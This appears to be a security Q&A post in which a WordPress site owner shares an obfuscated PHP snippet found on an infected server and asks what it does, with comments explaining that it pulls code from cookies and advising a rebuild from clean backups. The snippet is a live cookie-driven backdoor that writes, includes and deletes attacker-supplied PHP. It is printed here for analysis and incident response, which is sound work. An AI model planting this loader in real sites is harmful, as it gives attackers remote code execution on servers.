# How do I decode malicious PHP code to find out what it does?

Tags: php, wordpress, webserver, malware

I am dealing with Malware that keeps recreating files and is really hard to get rid of. Here is some code I think might be relevant..

The problem mainly affected WordPress Sites, I updated all the PHP versions and got rid of old plugins. I think it might be due to the recent Bricks exploit that happened around Valentines Day.

```
<?php
$tM = ${"\137" . "\103\117\117\113" .    "\111\105"};
if (isset($tM[(99    - 0)])) {
    $ScL = $tM[(88 - 8)]    . $tM[(38 - 10)];
    $skZ = $ScL($tM[(58    -    27)] . $tM[(44 - 33)]);
    $nTO = $skZ($ScL($tM[(98 - 1)]));
    $lvo =    $skZ($ScL($tM[(71 -    19)]));
    $yJd    = __DIR__ . $skZ($ScL($tM[(74 - 17)]));
    $nTO($yJd, $skZ($ScL($tM[(99 - 0)])));
    include($yJd);
    $lvo($yJd);
}
```

I already tried decoding this using Gemini, ChatGPT and Mixtral as well as by hand but I didn't get too far. I hope I get some more insights of what is happening, what this code does and why it keeps duplicating itself.

Comment: Related: [How do I deal with a compromised server?](https://security.stackexchange.com/questions/39231/how-do-i-deal-with-a-compromised-server)

Comment: `"\137" . "\103\117\117\113" .    "\111\105"` results in the value `_COOKIE`. So this will access different entries in the $_COOKIE array, to try and assemble a combination of code and data, that can be executed. What exactly happens, therefor totally depends on what cookies will get sent with the request.

Comment: Did you try bing copilot? After several try, it gave me enough details about your code.

Comment: If you ask me, I would tend to think that it is Code Obfuscation , but Hacking may also be likely

Comment: If these files keep recreating themselves there must be other infected / injected files that are responsible of rebuilding them when missing. You should consider deleting **everything** from your server and start over from the ground up with a known clean site backup. You may also need to have a look at the database, there could be malware stored in there too.

Comment: Also, worth reading: [FAQ My site was hacked](https://wordpress.org/documentation/article/faq-my-site-was-hacked/).